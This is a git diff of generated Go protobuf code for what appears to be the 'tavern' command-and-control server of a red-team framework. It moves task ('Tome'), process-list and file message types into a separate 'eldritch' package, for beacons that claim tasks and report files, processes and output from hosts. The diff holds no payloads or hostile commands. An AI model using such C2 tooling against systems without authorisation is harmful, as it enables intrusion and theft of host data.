0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2c, 0x0a, 0x14, 0x44, 0x6f, 0x77, 0x6e, 0x6c, + 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, + 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, + 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x52, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, + 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, + 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, + 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, + 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, + 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, + 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, + 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, + 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, + 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, + 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, + 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, + 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, + 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, + 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, + 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, + 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x32, 0xea, 0x02, 0x0a, 0x02, + 0x43, 0x32, 0x12, 0x3d, 0x0a, 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, + 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 
0x22, + 0x00, 0x12, 0x43, 0x0a, 0x0c, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, + 0x65, 0x12, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, + 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, + 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, + 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, + 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, + 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, + 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, 0x2e, 0x63, 0x32, 0x2e, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, + 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, 0x65, 0x70, 0x6f, 0x72, + 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x32, + 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, + 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, + 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x42, 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, 0x6c, + 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, + 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, + 0x72, 0x6f, 0x74, 0x6f, 0x33, } var ( @@ -1368,54 +1062,54 @@ func file_c2_proto_rawDescGZIP() []byte { return file_c2_proto_rawDescData } -var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 2) -var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 18) +var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 16) var file_c2_proto_goTypes = []interface{}{ (Host_Platform)(0), // 0: c2.Host.Platform - (Process_Status)(0), // 1: c2.Process.Status - (*Agent)(nil), // 2: c2.Agent - (*Beacon)(nil), // 3: c2.Beacon - (*Host)(nil), // 4: c2.Host - (*Process)(nil), // 5: c2.Process - (*Task)(nil), // 6: c2.Task - (*TaskError)(nil), // 7: c2.TaskError - (*TaskOutput)(nil), // 8: c2.TaskOutput - (*ClaimTasksRequest)(nil), // 9: c2.ClaimTasksRequest - (*ClaimTasksResponse)(nil), // 10: c2.ClaimTasksResponse - (*DownloadFileRequest)(nil), // 11: c2.DownloadFileRequest - (*DownloadFileResponse)(nil), // 12: c2.DownloadFileResponse - (*ReportFileRequest)(nil), // 13: c2.ReportFileRequest - (*ReportFileResponse)(nil), // 14: c2.ReportFileResponse - (*ReportProcessListRequest)(nil), // 15: c2.ReportProcessListRequest - (*ReportProcessListResponse)(nil), // 16: c2.ReportProcessListResponse - (*ReportTaskOutputRequest)(nil), // 17: c2.ReportTaskOutputRequest - (*ReportTaskOutputResponse)(nil), // 18: c2.ReportTaskOutputResponse - nil, // 19: c2.Task.ParametersEntry - (*timestamp.Timestamp)(nil), // 20: 
google.protobuf.Timestamp + (*Agent)(nil), // 1: c2.Agent + (*Beacon)(nil), // 2: c2.Beacon + (*Host)(nil), // 3: c2.Host + (*Task)(nil), // 4: c2.Task + (*TaskError)(nil), // 5: c2.TaskError + (*TaskOutput)(nil), // 6: c2.TaskOutput + (*ClaimTasksRequest)(nil), // 7: c2.ClaimTasksRequest + (*ClaimTasksResponse)(nil), // 8: c2.ClaimTasksResponse + (*DownloadFileRequest)(nil), // 9: c2.DownloadFileRequest + (*DownloadFileResponse)(nil), // 10: c2.DownloadFileResponse + (*ReportFileRequest)(nil), // 11: c2.ReportFileRequest + (*ReportFileResponse)(nil), // 12: c2.ReportFileResponse + (*ReportProcessListRequest)(nil), // 13: c2.ReportProcessListRequest + (*ReportProcessListResponse)(nil), // 14: c2.ReportProcessListResponse + (*ReportTaskOutputRequest)(nil), // 15: c2.ReportTaskOutputRequest + (*ReportTaskOutputResponse)(nil), // 16: c2.ReportTaskOutputResponse + (*epb.Tome)(nil), // 17: eldritch.Tome + (*timestamp.Timestamp)(nil), // 18: google.protobuf.Timestamp + (*epb.File)(nil), // 19: eldritch.File + (*epb.ProcessList)(nil), // 20: eldritch.ProcessList } var file_c2_proto_depIdxs = []int32{ - 4, // 0: c2.Beacon.host:type_name -> c2.Host - 2, // 1: c2.Beacon.agent:type_name -> c2.Agent + 3, // 0: c2.Beacon.host:type_name -> c2.Host + 1, // 1: c2.Beacon.agent:type_name -> c2.Agent 0, // 2: c2.Host.platform:type_name -> c2.Host.Platform - 1, // 3: c2.Process.status:type_name -> c2.Process.Status - 19, // 4: c2.Task.parameters:type_name -> c2.Task.ParametersEntry - 7, // 5: c2.TaskOutput.error:type_name -> c2.TaskError - 20, // 6: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp - 20, // 7: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp - 3, // 8: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon - 6, // 9: c2.ClaimTasksResponse.tasks:type_name -> c2.Task - 5, // 10: c2.ReportProcessListRequest.list:type_name -> c2.Process - 8, // 11: c2.ReportTaskOutputRequest.output:type_name -> c2.TaskOutput - 9, // 12: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest - 11, // 13: c2.C2.DownloadFile:input_type -> c2.DownloadFileRequest - 13, // 14: c2.C2.ReportFile:input_type -> c2.ReportFileRequest - 15, // 15: c2.C2.ReportProcessList:input_type -> c2.ReportProcessListRequest - 17, // 16: c2.C2.ReportTaskOutput:input_type -> c2.ReportTaskOutputRequest - 10, // 17: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse - 12, // 18: c2.C2.DownloadFile:output_type -> c2.DownloadFileResponse - 14, // 19: c2.C2.ReportFile:output_type -> c2.ReportFileResponse - 16, // 20: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse - 18, // 21: c2.C2.ReportTaskOutput:output_type -> c2.ReportTaskOutputResponse + 17, // 3: c2.Task.tome:type_name -> eldritch.Tome + 5, // 4: c2.TaskOutput.error:type_name -> c2.TaskError + 18, // 5: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp + 18, // 6: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp + 2, // 7: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon + 4, // 8: c2.ClaimTasksResponse.tasks:type_name -> c2.Task + 19, // 9: c2.ReportFileRequest.chunk:type_name -> eldritch.File + 20, // 10: c2.ReportProcessListRequest.list:type_name -> eldritch.ProcessList + 6, // 11: c2.ReportTaskOutputRequest.output:type_name -> c2.TaskOutput + 7, // 12: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest + 9, // 13: c2.C2.DownloadFile:input_type -> c2.DownloadFileRequest + 11, // 14: c2.C2.ReportFile:input_type -> c2.ReportFileRequest + 13, // 15: c2.C2.ReportProcessList:input_type -> 
c2.ReportProcessListRequest + 15, // 16: c2.C2.ReportTaskOutput:input_type -> c2.ReportTaskOutputRequest + 8, // 17: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse + 10, // 18: c2.C2.DownloadFile:output_type -> c2.DownloadFileResponse + 12, // 19: c2.C2.ReportFile:output_type -> c2.ReportFileResponse + 14, // 20: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse + 16, // 21: c2.C2.ReportTaskOutput:output_type -> c2.ReportTaskOutputResponse 17, // [17:22] is the sub-list for method output_type 12, // [12:17] is the sub-list for method input_type 12, // [12:12] is the sub-list for extension type_name @@ -1466,18 +1160,6 @@ func file_c2_proto_init() { } } file_c2_proto_msgTypes[3].Exporter = func(v interface{}, i int) interface{} { - switch v := v.(*Process); i { - case 0: - return &v.state - case 1: - return &v.sizeCache - case 2: - return &v.unknownFields - default: - return nil - } - } - file_c2_proto_msgTypes[4].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*Task); i { case 0: return &v.state @@ -1489,7 +1171,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[5].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[4].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*TaskError); i { case 0: return &v.state @@ -1501,7 +1183,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[6].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[5].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*TaskOutput); i { case 0: return &v.state @@ -1513,7 +1195,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[7].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[6].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ClaimTasksRequest); i { case 0: return &v.state @@ -1525,7 +1207,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[8].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[7].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ClaimTasksResponse); i { case 0: return &v.state @@ -1537,7 +1219,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[9].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[8].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*DownloadFileRequest); i { case 0: return &v.state @@ -1549,7 +1231,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[10].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[9].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*DownloadFileResponse); i { case 0: return &v.state @@ -1561,7 +1243,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[11].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[10].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportFileRequest); i { case 0: return &v.state @@ -1573,7 +1255,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[12].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[11].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportFileResponse); i { case 0: return &v.state @@ -1585,7 +1267,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[13].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[12].Exporter = 
func(v interface{}, i int) interface{} { switch v := v.(*ReportProcessListRequest); i { case 0: return &v.state @@ -1597,7 +1279,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[14].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[13].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportProcessListResponse); i { case 0: return &v.state @@ -1609,7 +1291,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[15].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[14].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportTaskOutputRequest); i { case 0: return &v.state @@ -1621,7 +1303,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[16].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[15].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportTaskOutputResponse); i { case 0: return &v.state @@ -1639,8 +1321,8 @@ func file_c2_proto_init() { File: protoimpl.DescBuilder{ GoPackagePath: reflect.TypeOf(x{}).PkgPath(), RawDescriptor: file_c2_proto_rawDesc, - NumEnums: 2, - NumMessages: 18, + NumEnums: 1, + NumMessages: 16, NumExtensions: 0, NumServices: 1, }, diff --git a/tavern/internal/c2/c2test/ent.go b/tavern/internal/c2/c2test/ent.go index eb61f26a6..14fb1e559 100644 --- a/tavern/internal/c2/c2test/ent.go +++ b/tavern/internal/c2/c2test/ent.go @@ -9,6 +9,7 @@ import ( "github.com/stretchr/testify/require" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" @@ -61,13 +62,15 @@ func ConvertTaskToC2PB(t *testing.T, ctx context.Context, task *ent.Task) *c2pb. return &c2pb.Task{ Id: int64(task.ID), - Eldritch: task. - QueryQuest(). - QueryTome(). - OnlyX(ctx). - Eldritch, - Parameters: params, - FileNames: fileNames, + Tome: &epb.Tome{ + Eldritch: task. + QueryQuest(). + QueryTome(). + OnlyX(ctx). + Eldritch, + Parameters: params, + FileNames: fileNames, + }, QuestName: task. QueryQuest(). OnlyX(ctx). diff --git a/tavern/internal/c2/epb/eldritch.pb.go b/tavern/internal/c2/epb/eldritch.pb.go new file mode 100644 index 000000000..709cff9e0 --- /dev/null +++ b/tavern/internal/c2/epb/eldritch.pb.go @@ -0,0 +1,602 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. +// versions: +// protoc-gen-go v1.28.1 +// protoc v3.6.1 +// source: eldritch.proto + +package epb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. 
+ _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) +) + +type Process_Status int32 + +const ( + Process_STATUS_UNSPECIFIED Process_Status = 0 + Process_STATUS_UNKNOWN Process_Status = 1 + Process_STATUS_IDLE Process_Status = 2 + Process_STATUS_RUN Process_Status = 3 + Process_STATUS_SLEEP Process_Status = 4 + Process_STATUS_STOP Process_Status = 5 + Process_STATUS_ZOMBIE Process_Status = 6 + Process_STATUS_TRACING Process_Status = 7 + Process_STATUS_DEAD Process_Status = 8 + Process_STATUS_WAKE_KILL Process_Status = 9 + Process_STATUS_WAKING Process_Status = 10 + Process_STATUS_PARKED Process_Status = 11 + Process_STATUS_LOCK_BLOCKED Process_Status = 12 + Process_STATUS_UNINTERUPTIBLE_DISK_SLEEP Process_Status = 13 +) + +// Enum value maps for Process_Status. +var ( + Process_Status_name = map[int32]string{ + 0: "STATUS_UNSPECIFIED", + 1: "STATUS_UNKNOWN", + 2: "STATUS_IDLE", + 3: "STATUS_RUN", + 4: "STATUS_SLEEP", + 5: "STATUS_STOP", + 6: "STATUS_ZOMBIE", + 7: "STATUS_TRACING", + 8: "STATUS_DEAD", + 9: "STATUS_WAKE_KILL", + 10: "STATUS_WAKING", + 11: "STATUS_PARKED", + 12: "STATUS_LOCK_BLOCKED", + 13: "STATUS_UNINTERUPTIBLE_DISK_SLEEP", + } + Process_Status_value = map[string]int32{ + "STATUS_UNSPECIFIED": 0, + "STATUS_UNKNOWN": 1, + "STATUS_IDLE": 2, + "STATUS_RUN": 3, + "STATUS_SLEEP": 4, + "STATUS_STOP": 5, + "STATUS_ZOMBIE": 6, + "STATUS_TRACING": 7, + "STATUS_DEAD": 8, + "STATUS_WAKE_KILL": 9, + "STATUS_WAKING": 10, + "STATUS_PARKED": 11, + "STATUS_LOCK_BLOCKED": 12, + "STATUS_UNINTERUPTIBLE_DISK_SLEEP": 13, + } +) + +func (x Process_Status) Enum() *Process_Status { + p := new(Process_Status) + *p = x + return p +} + +func (x Process_Status) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (Process_Status) Descriptor() protoreflect.EnumDescriptor { + return file_eldritch_proto_enumTypes[0].Descriptor() +} + +func (Process_Status) Type() protoreflect.EnumType { + return &file_eldritch_proto_enumTypes[0] +} + +func (x Process_Status) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use Process_Status.Descriptor instead. +func (Process_Status) EnumDescriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{1, 0} +} + +// Tome for eldritch to execute. +type Tome struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Eldritch string `protobuf:"bytes,1,opt,name=eldritch,proto3" json:"eldritch,omitempty"` + Parameters map[string]string `protobuf:"bytes,2,rep,name=parameters,proto3" json:"parameters,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + FileNames []string `protobuf:"bytes,3,rep,name=file_names,json=fileNames,proto3" json:"file_names,omitempty"` +} + +func (x *Tome) Reset() { + *x = Tome{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[0] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *Tome) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*Tome) ProtoMessage() {} + +func (x *Tome) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[0] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use Tome.ProtoReflect.Descriptor instead. 
+func (*Tome) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{0} +} + +func (x *Tome) GetEldritch() string { + if x != nil { + return x.Eldritch + } + return "" +} + +func (x *Tome) GetParameters() map[string]string { + if x != nil { + return x.Parameters + } + return nil +} + +func (x *Tome) GetFileNames() []string { + if x != nil { + return x.FileNames + } + return nil +} + +// Process running on the host system. +type Process struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Pid uint64 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"` + Ppid uint64 `protobuf:"varint,2,opt,name=ppid,proto3" json:"ppid,omitempty"` + Name string `protobuf:"bytes,3,opt,name=name,proto3" json:"name,omitempty"` + Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"` + Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"` + Cmd string `protobuf:"bytes,6,opt,name=cmd,proto3" json:"cmd,omitempty"` + Env string `protobuf:"bytes,7,opt,name=env,proto3" json:"env,omitempty"` + Cwd string `protobuf:"bytes,8,opt,name=cwd,proto3" json:"cwd,omitempty"` + Status Process_Status `protobuf:"varint,9,opt,name=status,proto3,enum=eldritch.Process_Status" json:"status,omitempty"` +} + +func (x *Process) Reset() { + *x = Process{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *Process) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*Process) ProtoMessage() {} + +func (x *Process) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[1] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use Process.ProtoReflect.Descriptor instead. +func (*Process) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{1} +} + +func (x *Process) GetPid() uint64 { + if x != nil { + return x.Pid + } + return 0 +} + +func (x *Process) GetPpid() uint64 { + if x != nil { + return x.Ppid + } + return 0 +} + +func (x *Process) GetName() string { + if x != nil { + return x.Name + } + return "" +} + +func (x *Process) GetPrincipal() string { + if x != nil { + return x.Principal + } + return "" +} + +func (x *Process) GetPath() string { + if x != nil { + return x.Path + } + return "" +} + +func (x *Process) GetCmd() string { + if x != nil { + return x.Cmd + } + return "" +} + +func (x *Process) GetEnv() string { + if x != nil { + return x.Env + } + return "" +} + +func (x *Process) GetCwd() string { + if x != nil { + return x.Cwd + } + return "" +} + +func (x *Process) GetStatus() Process_Status { + if x != nil { + return x.Status + } + return Process_STATUS_UNSPECIFIED +} + +// ProcessList of running processes on the host system. 
+type ProcessList struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + List []*Process `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` +} + +func (x *ProcessList) Reset() { + *x = ProcessList{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *ProcessList) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ProcessList) ProtoMessage() {} + +func (x *ProcessList) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[2] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ProcessList.ProtoReflect.Descriptor instead. +func (*ProcessList) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{2} +} + +func (x *ProcessList) GetList() []*Process { + if x != nil { + return x.List + } + return nil +} + +// File on the host system. +type File struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Path string `protobuf:"bytes,1,opt,name=path,proto3" json:"path,omitempty"` + Owner string `protobuf:"bytes,2,opt,name=owner,proto3" json:"owner,omitempty"` + Group string `protobuf:"bytes,3,opt,name=group,proto3" json:"group,omitempty"` + Permissions string `protobuf:"bytes,4,opt,name=permissions,proto3" json:"permissions,omitempty"` + Size int64 `protobuf:"varint,5,opt,name=size,proto3" json:"size,omitempty"` + Sha3_256Hash string `protobuf:"bytes,6,opt,name=sha3_256_hash,json=sha3256Hash,proto3" json:"sha3_256_hash,omitempty"` + Chunk []byte `protobuf:"bytes,7,opt,name=chunk,proto3" json:"chunk,omitempty"` +} + +func (x *File) Reset() { + *x = File{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *File) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*File) ProtoMessage() {} + +func (x *File) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[3] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use File.ProtoReflect.Descriptor instead. 
